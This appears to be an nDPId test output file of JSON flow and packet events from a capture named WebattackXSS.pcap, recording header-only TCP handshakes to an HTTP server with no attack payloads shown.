-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348082422,"flow_last_seen":1499348082422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348082422,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1499348082422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348082422,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EzVAAD4GspusEAABwKgKMovAAFDEhDu+AAAAAKACchCo6AAAAgQFtAQCCAoBPSiLAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":2,"flow_last_seen":1499348082422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348082422,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi8Dw+8kBxIQ7v6AScSDx4wAAAgQFtAQCCAoD5vn\/AT0oiwEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":3,"flow_last_seen":1499348082423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348082423,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EzZAAD4GsqKsEAABwKgKMovAAFDEhDu\/8PvJAoAQAOWQ6wAAAQEICgE9KIsD5vn\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9246,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348083715,"flow_last_seen":1499348083715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348083715,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9246,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1499348083715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348083715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aIdAAD4GXUmsEAABwKgKMovOAFCsxEFJAAAAAKACchC5zAAAAgQFtAQCCAoBPSnOAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":2,"flow_last_seen":1499348083716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348083716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi847RWyhrMRBSqAScSATnAAAAgQFtAQCCAoD5vtCAT0pzgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":3,"flow_last_seen":1499348083716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348083716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aIhAAD4GXVCsEAABwKgKMovOAFCsxEFKO0VsooAQAOWyowAAAQEICgE9Kc4D5vtC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348086300,"flow_last_seen":1499348086300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348086300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1499348086300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348086300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GytAAD4GqqWsEAABwKgKMovoAFCxvjd\/AAAAAKACchC7\/AAAAgQFtAQCCAoBPSxUAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":2,"flow_last_seen":1499348086300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348086300,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi+jtWBzhsb43gKAScSCw8gAAAgQFtAQCCAoD5v3IAT0sVAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":3,"flow_last_seen":1499348086301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348086301,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GyxAAD4GqqysEAABwKgKMovoAFCxvjeA7Vgc4oAQAOVP+gAAAQEICgE9LFQD5v3I"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348087568,"flow_last_seen":1499348087568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348087568,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1499348087568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348087568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WltAAD4Ga3WsEAABwKgKMov2AFAj3nfKAAAAAKACchAIRwAAAgQFtAQCCAoBPS2RAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":2,"flow_last_seen":1499348087568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348087568,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi\/boFFliI953y6AScSDEwgAAAgQFtAQCCAoD5v8FAT0tkQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":3,"flow_last_seen":1499348087569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348087569,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WlxAAD4Ga3ysEAABwKgKMov2AFAj3nfL6BRZY4AQAOVjygAAAQEICgE9LZED5v8F"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348090129,"flow_last_seen":1499348090129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348090129,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1499348090129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348090129,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nGpAAD4GKWasEAABwKgKMowQAFDWkax4AAAAAKACchAeSgAAAgQFtAQCCAoBPTASAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":2,"flow_last_seen":1499348090129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348090129,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjBAuWbjG1pGseaAScSAynQAAAgQFtAQCCAoD5wGFAT0wEgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":3,"flow_last_seen":1499348090130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348090130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nGtAAD4GKW2sEAABwKgKMowQAFDWkax5Llm4x4AQAOXRpAAAAQEICgE9MBID5wGF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9306,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348091413,"flow_last_seen":1499348091413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9306,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1499348091413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348091413,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nrdAAD4GJxmsEAABwKgKMoweAFAj3q\/lAAAAAKACchDMQQAAAgQFtAQCCAoBPTFTAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":2,"flow_last_seen":1499348091413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348091413,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjB4dm6koI96v5qAScSD\/rwAAAgQFtAQCCAoD5wLGAT0xUwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":3,"flow_last_seen":1499348091414,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348091414,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nrhAAD4GJyCsEAABwKgKMoweAFAj3q\/mHZupKYAQAOWetwAAAQEICgE9MVMD5wLG"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348092675,"flow_last_seen":1499348092675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348092675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1499348092675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348092675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WzpAAD4GapasEAABwKgKMowsAFACaGm0AAAAAKACchAyoAAAAgQFtAQCCAoBPTKOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":2,"flow_last_seen":1499348092675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348092675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjCznHw5PAmhptaAScSA2JwAAAgQFtAQCCAoD5wQCAT0yjgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":3,"flow_last_seen":1499348092676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348092676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WztAAD4Gap2sEAABwKgKMowsAFACaGm15x8OUIAQAOXVLgAAAQEICgE9Mo4D5wQC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348095258,"flow_last_seen":1499348095258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348095258,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1499348095258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348095258,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kglAAD4GM8esEAABwKgKMoxGAFCLy6cdAAAAAKACchBpMwAAAgQFtAQCCAoBPTUUAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":2,"flow_last_seen":1499348095258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348095258,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjEYHlr2li8unHqAScSCaZwAAAgQFtAQCCAoD5waIAT01FAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":3,"flow_last_seen":1499348095259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348095259,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kgpAAD4GM86sEAABwKgKMoxGAFCLy6ceB5a9poAQAOU5bwAAAQEICgE9NRQD5waI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9348,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348096595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
